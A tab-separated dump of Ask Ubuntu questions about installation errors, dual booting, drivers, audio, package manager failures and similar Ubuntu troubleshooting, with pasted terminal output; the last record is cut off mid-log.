515038	the package lists or status file could not be parsed or opened ( error during installation )	i have using ubuntu for the past 6 months , i tried adding edubuntu desktop to my ubuntu and there the problem started i could n't login to desktop again , everytime i login it will ask me to login . so i tried to install a fresh ubuntu by the following steps : i deleted the previous ubuntu partition and swap area then created a new one i proceeded with the installation this error keep appearing ; error : e : problem renaming the file /var/cache/apt/srcpkgcache.bin.brsput to /var/cache/apt/srcpkgcache.bin - rename ( s : input/output error ) , e : problrm renaming the file /var/cache/apt/pkgcache.bin.amltnt to /var/cache/apt/pkgcache.bin - rename ( s : input/output error ) , e : the package lists or status file could not be parsed or opened please help me ! ! !
515039	libcairo.so for ubuntu 14.04 is dead-slow compared to ubuntu 13.10	i 'm running the video mixer software called snowmix that uses libcairo extensively . after updating to ubuntu 14.04 desktop amd64 , i noticed that mixing video required 8 times more cpu . using oprofile i discovered the heavy cpu load was taking place in libpixman used by libcairo . however currently libpixman is currently the same release in ubuntu 14.04 and 13.10 . however i did notice that libcairo got upgraded from libcairo.so.2.11200.16 in ubuntu 13.10 to libcairo.so.2.11301.0 in uuntu 14.04 . replacing libcairo.so.2.11301.0 with libcairo.so.2.11200.16 in ubuntu 14.04 lower the cpu usage by at least 8 times . so i suspect that libcairo for ubuntu 14.04 somehow got compiled without the hardware acceleration such as mmx/sse2/sse3 etc . this is quite bad if this is the case . does anybody know how to report this to ubuntu so they can generate an update for libcairo for ubuntu 14.04 ? thanks in advance . peter maersk-moller
515044	manual installation help	when i install ubuntu by using something else and create the partitions what should i usually do is select the mount point as root ie / i wonder what are the other mount options used for and what can is the best option for booting along with the windows 8 and windows 7
515045	keyboard keys @ and `` are switched	keyboard keys @ and `` are switched after i 've installed ubuntu 14.04. any solution to this ? thanks in advance .
515047	xen xl broken installation , can not start dom-u ( trusty , 4.4 )	i was switching xen toolstack from xm to xapi . did n't work , so i upgraded from 12.04 to 14.04 with the hopes that it would work better . it did n't . now i can not start any dom-u . xl is installed instead of both xm and xapi . what do i need to fix ? root @ shiva ~ # uname -a linux shiva.lan2k.org 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux root @ shiva ~ # xl list name id mem vcpus state time ( s ) ( null ) 0 1024 1 r -- -- - 19422.3 root @ shiva ~ # xl info host : shiva.zzzzz.org release : 3.13.0-34-generic version : # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 machine : x86_64 nr_cpus : 8 max_cpu_id : 7 nr_nodes : 1 cores_per_socket : 4 threads_per_core : 2 cpu_mhz : 3400 hw_caps : bfebfbff:2c100800:00000000:00007f00:77fafbff:00000000:00000021:00002fbb virt_caps : hvm hvm_directio total_memory : 32630 free_memory : 31179 sharing_freed_memory : 0 sharing_used_memory : 0 outstanding_claims : 0 free_cpus : 0 xen_major : 4 xen_minor : 4 xen_extra : .0 xen_version : 4.4.0 xen_caps : xen-3.0-x86_64 xen-3.0-x86_32p hvm-3.0-x86_32 hvm-3.0-x86_32p hvm-3.0-x86_64 xen_scheduler : credit xen_pagesize : 4096 platform_params : virt_start=0xffff800000000000 xen_changeset : xen_commandline : placeholder dom0_mem=1g , max:1g dom0_max_vcpus=1 cc_compiler : gcc ( ubuntu 4.8.2-19ubuntu1 ) 4.8.2 cc_compile_by : stefan.bader cc_compile_domain : canonical.com cc_compile_date : wed jul 9 12:05:24 utc 2014 xend_config_format : 4 root @ shiva ~ # xl create /etc/xen/ftp2.zzzzz.org.cfg parsing config from /etc/xen/ftp2.zzzzz.org.cfg libxl : error : libxl_dm.c:1371 : device_model_spawn_outcome : domain 3 device model : spawn failed ( rc=-3 ) libxl : error : libxl_create.c:1186 : domcreate_devmodel_started : device model did not start : -3 libxl : error : libxl_dm.c:1475 : kill_device_model : device model already exited libxl : error : libxl_device.c:780 : libxl__initiate_device_remove : unable to get my domid libxl : error : libxl_device.c:780 : libxl__initiate_device_remove : unable to get my domid libxl : error : libxl.c:1457 : devices_destroy_cb : libxl__devices_destroy failed for 3
515048	not able to shutdown ubuntu	i am having one more problem in my ubuntu , whenever i try to shutdown ubuntu , shutdown process seems to be started , after 4 dots , system gets hanged and forcefully i keep press power to switchoff my system . i am able to restart and logout properly , this is since my first installation of the ubuntu ubuntu 14.04.1 version & i am having laptop of hp ( ubuntu is working parallel with windows 8 ) thanks in advance
515050	digisol mobile broadband not detected by ubuntu12.04	digisol usb mobile broadband not detected by ubuntu 12.04 i am new to ubuntu when connected to usb port green light blinks but network not connected whenever type dmesg in terminal it showing usb modem but modem driver not installed plese help me
515051	can anyone tell me how to dual boot a system with ubuntu 14.04	can anyone tell me how to dual boot a system with ubuntu 14.04lts . http : //www.instructables.com/id/how-to-dual-boot-linux-and-windows-on-a-pc-with-w/
515055	my dual-boot ubuntu/windos boots right into windows	i 'm running a dual-boot system with windows 8.1 and ubuntu 14.04 . after reinstalling both oss several times my system boots right into windows . some information i gathered : if i have a bootable usb ( either ubuntu or windows ) plug in and boot to the windows recovery screen and select the boot from external device i can select ubuntu and boot into it . there i installed the boot-repair tool which told me to deactivate the secure boot option in my bios , which i did , but which also did n't change anything . i ran boot-repair again and it got caught in an infinite loop doing the same things again and again with no option to cancel it . but i got the information log ( http : //paste.ubuntu.com/8121921/ ) . my guess is that either windows overwrote the grub or that i installed it to the wrong partition . but i screwed my system several times by now and it 's still not working as it did with the oem which is kind of a big deal 'cause i kinda need some features back for school ... but that 's some other story ... so if someone could give me some ( detailed ) instructions on how to get grub to working again without killing windows please tell me .
515056	automate ssh commands and read output	i am working on my assignment where i have to enter a certain key on ssh terminal to open next problem . there are several candidate keys which i have shortlisted and i need to enter them via ssh , which i am looking to automate . manual procedure - 1 . login to ssh via terminal . 2 . enter team name 3 . enter password 4 . enter candidate key and check response from server if its correct or not . 5 . enter next candidate key . is there any way to automate this task using shell or python , please give me pointers i will work on that with my own . thanks
515059	libgdx project generator : build failed : can not find java system compiler	while generating a project libgdx throws thid error : failure : build failed with an exception . * what went wrong : execution failed for task ' : core : compilejava ' . > can not find system java compiler . ensure that you have installed a jdk ( not just a jre ) and configured your java_home system variable to point to the according directory . * try : run with -- stacktrace option to get the stack trace . run with -- info or -- debug option to get more log output . build failed my java and jdk version : : ~ $ java -version java version `` 1.7.0_65 '' openjdk runtime environment ( icedtea 2.5.1 ) ( 7u65-2.5.1-4ubuntu1~0.14.04.1 ) openjdk 64-bit server vm ( build 24.65-b04 , mixed mode ) what should i do ? plz help ! !
515060	dropbox slow on ubuntu 14.04	my dropbox syncing is incredibly slow ... i am using dropbox from the ubuntu repository on an almost fresh ubuntu installation . i would like to avoid to install the package from the dropbox website for the reasons explained here dropbox upgrade is someone having the same problem ? how can i solve ? edit : this is an example of what i get . donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ dropbox status syncing ( 17 files remaining , 22 secs left ) uploading 17 files ( 123.3 kb/sec , 22 secs left ) donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ dropbox status syncing ( 17 files remaining , 3 mins left ) uploading 17 files ( 13.2 kb/sec , 3 mins left ) donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ dropbox status syncing ( 17 files remaining , 5 mins left ) uploading 17 files ( 8.2 kb/sec , 5 mins left ) donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ dropbox status syncing ( 17 files remaining ) uploading 17 files ... donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ dropbox status syncing ( 17 files remaining ) uploading 17 files ... donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ edit : i have run sudo dropbox update so i am probably using the last version of dropbox edit : donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ apt-cache policy dropbox dropbox : installed : ( none ) candidate : ( none ) version table : donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ apt-cache policy nautilus-dropbox nautilus-dropbox : installed : 1.6.1-1 candidate : 1.6.1-1 version table : *** 1.6.1-1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages 100 /var/lib/dpkg/status donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ edit : without the need of any changes dropbox is now working well . i think that the problem has probably been solved with an update or something . if someone is still having this problem and wants to know my version of dropbox or other details i am happy to help .
515061	which algorithm used by ubuntu or linux for file or folder searching in directory	i have a project in my college to search file or folder using the linux or ubuntu algorithm . i have to adapt it for mac and windows . which algorithm does ubuntu use ? or what these all os use to search any file folder in directory ... ..
515066	can not buy software in ubuntu software center ( usc )	ubuntu version 14.04 software-center version 13.10 unable to load page problem occurred while loading the url https : //apps.ubuntu.com/cat/tos/plain/ ssl handshake failed it never works since i install ubuntu
515069	how to get data from semi broken micro sdxc card ?	i used to have a 64gb micro sdxc card in my mobile phone . but last week , after the phone crashed and i had to restart it hard , the sd card was not mounted anymore . the phone tried for 5 minutes but then told me i could safely remove the sd card . so i put the sd card in the adapter and inserted it into my laptop computer , windows 7 . nothing happened . windows recognized the sd card but clicking it led to no reaction . then i got out my pen drive linux with ubuntu 14.04-1 lts . and i got some results . when i inserted the card i got a dialogue telling me that a medium with digital photos had been detected and asked me for further actions . when i selected `` open folder '' ubuntu crashed hard ( kernel panic ) i searched for help and found http : //unix.stackexchange.com/questions/53542/how-to-determine-the-filesystem-of-an-unmounted-device . here is the output for the commands recommended there : fdisk : sudo fdisk /dev/dsc1 -l disk /dev/sdc1 : 63.9 gb , 63863521280 bytes 64 heads , 32 sectors/track , 60905 cylinders , total 124733440 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system parted : sudo parted /dev/sdc1 -l model : generic- xd/sd/m.s . ( scsi ) disk /dev/sdc : 63,9gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 63,9gb 63,9gb primary fat32 boot , lba file : sudo file -sl /dev/sdc1 /dev/sdc1 : x86 boot sector executing df -t leads to the same crash as above . i would like to know which programs or commands to use in this situation in order to get at least my photos off the sd card or even better , all files or an image file . if the sd card itself is lost , so be it , i only need the data .
515070	ubuntu touch installation	i have an asus phone model zenphone '' 5 '' i want to install ubuntu touch in it . it have cpu = 1.6 ghz , intel atom z2560 , dual core , ram= 2 gb internal storage 16 gb can ubuntu touch support this hardware i know about nexus related information but can you please check this link is it any possibility for this phone phone technical specifications http : //www.asus.com/phones/asus_zenfone_5/specifications/
515073	latest xubuntu mute volume stuck	i 've tried a few things but i ca n't unmute the volume . i can move the slider up and down but it this pop up , http : //i.imgur.com/riscbth.png remains . please let me know what further info you require so i may be helped . also the volume works on the other accounts . running a dell xps 210 . it happened when i was raising the volume . i do n't know why ? on ubuntu 14.10
515080	can not format my sd card	i have a 8 gb memory card which is totally corrupted and i am not able to format it using gparted , terminal and other tools.every time getting error messages .
515081	upgrade xubuntu 6.04 to more recent os on ppc	i cant figure out how to upgrade my xubuntu installation on my imac g3 please help
515082	is it possible to mount a 4tb ntfs hdd ?	i am new to linux and just installed ubuntu for the first time ( 14.04 ) . i repartitioned my 160gb sdd to give 100gb to windows and 50gb to ubuntu . 1 ) i do n't know if i even need a 6gb swap partition ? ubuntu did that itself during the install . system specs : cpu : intel® core™ i7-950 processor ( 8m cache , 3.07 ghz ) , mobo : asus sabertooth x58 , ram : vengeance 6gb triple channel ddr3 , gpu : amd radeon hd 6900 2 ) also my 4tb wd hdd is not showing up under ubuntu is there any way to get it recognized ? ( shown as tv_shows ( h : ) below . ) 3 ) is there a easy way to let my computer boot linux automatically and switch from linux to windows from ubuntu itself ? so it does not show the grub menu on boot every time . thanks in advance !
515083	14.04.01 upgrade and no wi-fi . bcm4312	i have a laptop dell mini 910 inspirion wireless card : wireless 802.11g mini card 32-bit itel atom processor , n270 512k cashe , 1.60ghz , 533mhz fsb did a 14.04.01 upgrade and do not have wi-fi . same thing happened on previous upgrade to 12.03.3 lts . solution was to get 2480236-broadcom firmware.tar.gz . i tried this and nothing . troubleshooting thus far : type of card : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] { rev 01 } i can see the empty ( no signal ) wi-fi icon . ran command : nm-tool state : disconnected device : eth0 type : r8169 state : unavailable default : no hw address : 00:21:70 : d7 : eb : cc capabilities : carrier detect : yes wired properties carrier : off ran command : iwconfig lo no wireless extensions . eth0 no wireless extensions . anyhelp would be appreciated . thanks .
515084	problem with ie8 on ubuntu	while working with ie8 on ubuntu i am facing some problems . i 'm not able to open a new tab ; if i do so , then an message comes up : `` playonlinux seems to have crashed . '' i 'm not able to work on ie8 for a long time ; the same message comes and ie8 goes out .
515085	ubuntu missing some interface parts	im new to linux but as a begginer im getting alot of problemes that i ca n't deal with but the one that really harassing me that some applicaions that i install is missing some interfaces elements like the picture below of the virtualbox there should be some menus like new and settings etc also gedit when i open the preferences menu only the tittle appears and no menu appears like the picture shown below i also tried reinstallinbg it but the same problem remains btw it worked proberly when i first installed it as well as virtualbox but i 'm sure that i did n't change a thing in them that may cause such a problem can someone tell me why that problem occurs and how to resolve it ? os : ubuntu 14.04 lts gpu : ati radeon hd 2600 xt
515086	ubuntu software center and upgrade	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . misiko @ misiko-hp-530-notebook-pc : ~ $ apt-get package list 12.10 e : invalid operation package misiko @ misiko-hp-530-notebook-pc : ~ $ sudo apt get package list sudo : apt : command not found misiko @ misiko-hp-530-notebook-pc : ~ $ sudo apt-get install package list reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
515087	failed to unmount partitions	i 'm trying to install ubuntu from a pen drive . i have windows 7 installed already and want to keep that installation . i have a 3tb drive that has one 2tb partition on it , so the last 1tb is completely unused , which is where i want to install ubuntu . i started ubuntu in `` try ubuntu '' mode and then opened gparted , and then deleted the unused partition for the last third of my drive , then tried to install ubuntu . during the install , it asked me if i wanted to unmount the drives i already have the installer has detected that the following disks have mounted partitions : /dev/sda , /dev/sdb do you want the installer to try to unmount the partitions on these disks before continuing ? if you leave them mounted , you will not be able to create , delete , or resize partitions on these disks , but you may be able to install to existing partitions there . no , yes i said no because i do n't want to lose my windows 7 installation , nor any of that data . i wonder , if i had said yes above , would i have lost all the data on those drives ? anyways , i hit no and continued . i chose to install ubuntu alongside windows 7 , and hit continue . a few minutes passed when this popup appeared : failed to unmount partitions the installer needs to commit changes to partition tables , but can not do so because the partitions on the following mount points could not be unmounted : /media/ubuntu/three\ terabyte drive terabyte\ drivedrive please close any applications using these mount points . would you like the installer to try to unmount these partitions again ? go back , continue why is this not working ? what am i supposed to do ? ========== update : i went ahead and said yes , it can unmount those partitions . it finished installing ubuntu , but now when i start my machine it just takes me to the grub rescue prompt . seems like it broke something . what can i do now ? =============== results of fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00027e14 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 976771071 488282112 7 hpfs/ntfs/exfat warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdc : 16.0 gb , 16008609792 bytes 255 heads , 63 sectors/track , 1946 cylinders , total 31266816 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 32 31266815 15633392 c w95 fat32 ( lba ) disk /dev/sdd : 999.5 gb , 999501594624 bytes 255 heads , 63 sectors/track , 121515 cylinders , total 1952151552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002ae3f device boot start end blocks id system /dev/sdd1 2048 1952151551 976074752 7 hpfs/ntfs/exfat ======================================= update : after having re-installed ubuntu a dozen times now , and even buying a new hard drive specifically for ubuntu , i am convinced now that this issue is a bug in ubuntu 's installation . i had the same problem after every time i installed ubuntu . i do n't think i did anything wrong , i think the problem is that ubuntu is not setting up grub correctly . i followed the instructions offered by scott severence 's answer to this question . he explained how i could update and re-install grub . unfortunately for me though , after reinstalling grub , it still does n't work . when i boot , it launches windows 7 . if instead i tell it to boot using the new hard disk , it goes straight to grub rescue . somebody please help me , this problem is consuming my entire weekend .
515089	xubuntu 14.04 - pulseaudio / alsa will not work with usb headset	being relatively new to linux , i just shot for xubuntu . i had to reformat yesterday , because i somehow nuked it in my tired adventures . ever since then , i have n't been able to get my usb audio working . when runninglsusb , my headset shows up as bus 005 device 003 : id 0d8c:013c c-media electronics , inc. cm108 audio controller , yet it does not appear when i runaplay -l oraplay -l ( results for either command ) on runninpacmd list-sinks , i only get a dummy output could somebody tell me what i 'm doing wrong , and how i can sort this out ?
515090	how do i know if my 3.5mm jack supports line-in ?	i have a lenovo x220 and i want to know if the 3.5mm audio jack supports line-in with an external mic , or if it is only line-out . how do i find out this information ? if it works , how do i switch to line-in ? i attached all the images i could get from alsamixer .
515097	passing commands for the new session in tmux	what i want to do is to run a script without having to de-attach myself manually . so at the moment i have a script let 's say called tmuxscript.sh , every time i have to either use the previous session or create a new session , then run tmuxscript.sh and then de-attach the session by pressing ctrl+b d. is there a way to do all of these steps with one command ?
515098	should i upgrade to `` ubuntu 14.04 'trusty tahr ' '' from `` ubuntu 12.04 lts '' and what care do i need to take if i upgrade ?	i 'm basically a web developer ( php developer ) by profession . i mainly work on php , jquery , ajax , smarty , html and css , bootstrap front-end web development framework . i 've also installed and using ides/editors like sublime text , netbeans . i 'm also using git repository for my website development as a versioning tool . i 'm using `` ubuntu 12.04 lts '' on my machine almost since last two years . my machine configuraion is as follows : memory : 3.7 gib processor : intel® core™ i3 cpu m 370 @ 2.40ghz × 4 graphics : unknown os type : 64-bit disk : 64-bit the important softwares present on my machine and which i 'm using daily for my work are as follows : php : php 5.3.10-1ubuntu3.13 with suhosin-patch ( cli ) ( built : jul 7 2014 18:54:55 ) copyright ( c ) 1997-2012 the php group zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies apache web server : /usr/sbin/apachectl : 87 : ulimit : error setting limit ( operation not permitted ) server version : apache/2.2.22 ( ubuntu ) server built : jul 22 2014 14:35:25 server 's module magic number : 20051115:30 server loaded : apr 1.4.6 , apr-util 1.3.12 compiled using : apr 1.4.6 , apr-util 1.3.12 architecture : 64-bit server mpm : prefork threaded : no forked : yes ( variable process count ) server compiled with ... . -d apache_mpm_dir= '' server/mpm/prefork '' -d apr_has_sendfile -d apr_has_mmap -d apr_have_ipv6 ( ipv4-mapped addresses enabled ) -d apr_use_sysvsem_serialize -d apr_use_pthread_serialize -d single_listen_unserialized_accept -d apr_has_other_child -d ap_have_reliable_piped_logs -d dynamic_module_limit=128 -d httpd_root= '' /etc/apache2 '' -d suexec_bin= '' /usr/lib/apache2/suexec '' -d default_pidlog= '' /var/run/apache2.pid '' -d default_scoreboard= '' logs/apache_runtime_status '' -d default_lockfile= '' /var/run/apache2/accept.lock '' -d default_errorlog= '' logs/error_log '' -d ap_types_config_file= '' mime.types '' -d server_config_file= '' apache2.conf '' mysql : 5.5.38-0ubuntu0.12.04.1 smarty : 2.6.18 **netbeans : ** netbeans ide 8.0 ( build 201403101706 ) sublime text 2 : version 2.0.2 , build 2221 yesterday suddenly a pop-up message appeared on my screen asking me to upgrade to `` ubuntu 14.04 'trusty tahr ' '' . i 'd also be very happy to upgrade my system to `` ubuntu 14.04 'trusty tahr ' '' . following are the issues about which i 'm little bit scared about and i need you all talented people 's expert advice/help/suggestions on it : will upgrading to `` ubuntu 14.04 'trusty tahr ' '' affect the softwares i mentioned above ? i mean will i need to re-install/un-install and install these softwares too ? do i really need to and is it really a worth to upgrade to `` ubuntu 14.04 'trusty tahr ' '' from `` ubuntu 12.04 lts '' now ? if i upgrade to `` ubuntu 14.04 'trusty tahr ' '' what advantage i 'll get from web developer 's point of view ? will the upgrade be hassle free and will i be able to continue my on-going work without any difficulties ? is `` ubuntu 14.04 'trusty tahr ' '' a lts version and if yes till when it 's going to provide support ? these are the five crucial queries i have . if you want any further explanation from me please feel free to ask me . thanks for spending some of your vaulable time in reading and understanding my issue . any kind of help/comment/suggestion/answer would be highly appreciated . though if someone gives canonical , precise and up to the mark answer , it will be of great help to me as well as other web developers using ubuntu around the world . once again thank you so much you great people around the globe . waiting for your precious replies .
515099	how to get back to ubuntu from chrome os ?	i installed ubuntu from lifehacker.com , onto my acer chromebook , where you access it by switching back and forth between chrome os and ubuntu with ctrl alt shift and . i had shut down my computer and when i turned it on , i was unable to access ubuntu again . i need help getting back to it to install some programs that i require . please help .
515100	where are settings store ?	is there a setting or config file store user settings changed in system settings window ? i used to change keyboard 's delay and repeat speed , change appearance background settings , change screen suspend settings , change power settings , etc . i 'm tired with those manual settings every time . can somebody tell me where are those settings stored ?
515103	how to display all user and groups by command	i want to display 1 . all users and 2 . all groups in my pc by using command-line . users and groups displays users currently logged and groups a user is in respectively . how to display list of all users and 2nd all groups by command-line ?
515108	no boot option after install	hello recently i built a computer with an msi 970a-g43 , amd fx 6300 , and gskill ripjaw 2gb ram and was wondering if there 's any compatibility issues because after installing ubuntu it does not show up on the boot options i have searched far and wide for the answer and would be grateful if someone were to help .
515109	what applications are available to ubuntu for android ?	i was checking this ubuntu for android stuff . is it an android system , meaning that i can install basically any app from google play or does it have specific applications ?
515111	apt-fast for ubuntu 14.04 ?	i just upgraded to ubuntu 14.04 from ubuntu 12.04 ( which i loved ) and now , i cant install apt-fast . my net connection is very slow and i want to download using apt-fast but whenever i add the apt-fast ppa and update and try to install it , it says package apt-fast not found how do i fix this ? thank you . i really appreciate the effort made by askubuntu ( which includes you awesome people ; ) ) to help me . my problem has already been answered . here is a screenshot of my software sources . the person who answered my question has apparently removed the comment that answered my question but here is the repository that helped me add apt-fast sudo add-apt-repository ppa : saiarcot895/myppa so if this helps i would like to upvote each and every person who helped me and i will accept one answer too , just give me some time to test both of them ; ) anyway thank you guys to help me . you are awesome : - ) xd
515113	screen tearing with gt 730m ( and no sync to vblank option in nvidia settings )	i 've got problems with screen tearing while using geforce gt 730m ( gpu is optimus with additionally intel 4000 ) . tearing appears during scrolling websites , watching movies , playing games etc . i 've read on many forums that it should be checked sync to vblank option in nvidia x server settings in opengl settings but i do n't have such option ( there 's only `` use conformant texture clamping '' which is marked ) . now i 'm using nvidia 340.32 drivers from xorg-edgers/ppa but the issue was the same with 331.38 drivers from repository . with linux mint ( my first linux at all ) also the same . so far i 've tried for example to set nvidia settings on `` prefer maximum performance '' or to add to /etc/environment/ the following : clutter_paint=disable-clipped-redraws : di足sable-culling clutter_vblank=true nothing works . i really need your help and every try is welcomed . if it matters , in windows 7 there was no problem with my gt 730m . regards
515114	question about dual booting	i 'm very new to ubuntu ( and any non-windows os in general ) and i 'm currently running windows 8.1 and ubuntu 14.04 dual-booted . i 'm not the only person to use this computer , so i was wondering if it was possible to have it boot into windows 8.1 unless i tell it to boot into ubuntu . it currently starts at a purple screen and allows me to choose windows or ubuntu or a couple other options , which is `` annoying '' to the other user .
515116	appgrid saves all images in 'downloads ' folder	i installed appgrid and everything works great , but all apps images was saved in 'downloads/appgrid ' folder . how can i change folder for image saving ? by the way , i 'm using lubuntu 14.04 .
515117	install in ubuntu 14.04.1 lts	i was install installing ubuntu and got a fatal error on final step . it was gong thru all the confirmation of installing when it said : fatal error : keyboard locked is there any solution
515119	update-manager fails silently on 14.04	i recently reinstalled a lubuntu from scratch , to upgrade to 14.04 . everything 's working as expected , except for the update-manager that silently fails when trying to upgrade my system 's packages . it does correctly list the packages to be upgraded , i can then click on the `` install now '' button ( or something like this , i 'm running a french flavour of ubuntu ) . when i click the button , it seems unresponsive for 5 to 10 seconds , then the upgrade dialog with the progress bar appears , displays `` loading package list '' , then very shortly something about `` authentication '' ( not long enough so that i can read it ) .. and closes . the install is fresh and i have no idea where to look . i tried launching update-manager in a term but it does n't display any error when it fails , only this message when the window first shows up : ** ( update-manager:3642 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-m0jkflz3yo : connexion refusăše . any idea where this might come from ? i can upgrade the packages using the command line and sudo apt-get but this is not my computer , and i do not wish its owner to have to do this to upgrade the packages . thanks for your help !
515120	installation with fakeraid	i have a problem while installing ubuntu on my laptop . actually , windows 8 is installed with a raid0 managed by the intel rapid storage technology . at first , i tried to install without delete this raid . hopefully , i could delete it after and retry everything from the beginning . after some searches on forum , i 've seen that it is better to create a new raid0 using mdadm . that 's what i do not but i still get the same error when installing ubuntu . the step where the error comes is the one where grub is being installed . looking after on this forums , i discovered that some people had also this problem and they give a solution to fix it . latter is available on this website : https : //help.ubuntu.com/community/grub2/installing # via_chroot my problem is that i can do every step described because i quickly get an error . the first one comes at step 7 when i need to mount the raid : it seems that the disk is already mounted ou that mnt is busy . anyway , if i try to go further and try to do the chroot command , they said that the directory does n't exist despite it is . does someone know how to solve this problem ? thank you in advance
515121	lubuntu 14.04.1 - load installer components from cd fails , although integrity is ok - why ?	i am trying to install lubuntu-14.04.1-alternate-amd64 on a usb stick - and oh my , is that some trouble . my setup : win7 uefi system with enabled secure boot my target : 64gb usb 3.0 stick in usb3 port , gpt , has esi partition , fat32 partition , 8302 ext4 home , swap , 8304 ext4 root my sources : lubuntu-14.04.1-alternate-amd64.iso based install-cd ( somehow not bootable ) lubuntu-14.04.1-alternate-amd64.iso based install-sdcard ( done with dd copy of the iso , bootable ) my target has the lubuntu-14.04.1-desktop-amd64.iso on his fat32 partition and i can boot from it my problem : i can boot the sdcard , check the disk , everything is ok , but `` load installer components from cd '' fails . i 've checked the iso and it 's contents with md5 , all is fine . i can even use the iso in a uefi based vm and the problem is not there . however , my vm wo n't accept my multiparitioned usb-stick . because the gui-based installer tries to mess with my partitions , i am using the alternate-iso . i do n't want to format my partitions , i just want a system copied to them . my goal : an usb stick that is bootable on a uefi system with active secure boot , that boots to win7 by default and a lubuntu 14.04.1 from the stick by choice . due to a specific partitioning that is aligned and adjusted to my usb stick i do not want to change any parition sizes and which to not format them . is there any way to achieve this ? because i am currently at the end of my rope here : ( thank you guys !
515125	xorg error no gui showing	i have a machine with 14.04.1 desktop and last night after installing wine and rebooting i noticed that xorg started but then crashed as the cursor showed for a little while then disappeared so on went to a terminal and did sudo xorg and it showed what i have in the picture but no cursor or indication of a gui starting . until i get the picture uploaded the last two lines were initializing built-in extension dri2 setversion 1.4 failed : permission denied
515126	how to make ubuntu 14.04 run with less lag ?	i recently updated from ubuntu 12.04 lts to 14.04 lts and for the first time it worked ! however , whenever i move my mouse over an application icon on the unity shell , the animation takes forever to show me what the name of the application is ( a.k.a the tooltip ) . the same happens with menus and sub-menus . other than that , it is overall in general , slow . i just want to know if there are any tips to fix this or make my system faster . this is what it says when i type in glxinfo | grep renderer : glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) output of lspci | grep vga : 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 )
515127	kile not working on ubuntu 14.04 ( error : can not open log file ; did you run latex ? )	i have recently updated to ubuntu 14.04 and when i try to compile a .tex file using pdflatex in kile , i get the error message : can not open log file ; did you run latex ? i tried the following to install latex based on what i saw here : http : //www.programcreek.com/2014/01/how-to-install-latex-on-ubuntu-14-04lts/ : sudo apt-get install texlive-latex-extra but get the error : processing was halted because there we : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help ? ! ? update : here is the output of sudo apt-get install -f texlive-latex-extra ( note that there were many more dpkg : error processing package ... messages that i could not include due to limitations on how long this post can be ) : $ sudo apt-get install -f texlive-latex-extra reading package lists ... done building dependency tree reading state information ... done texlive-latex-extra is already the newest version . the following packages were automatically installed and are no longer required : alien debugedit libfontconfig1-dev libnxcl1 libpathplan4 librpmbuild3 librpmsign1 libxcomp3 libxft-dev lsb-core lsb-security ncurses-term nxproxy pax plotutils rpm use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 81 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up tex-common ( 4.04 ) ... ignoring /etc/texmf/texmf.d/05texmf.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/15plain.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/45texinputs.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/55fonts.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/65bibtex.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/75dvips.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/80dvipdfmx.cnf during generation of texmf.cnf , 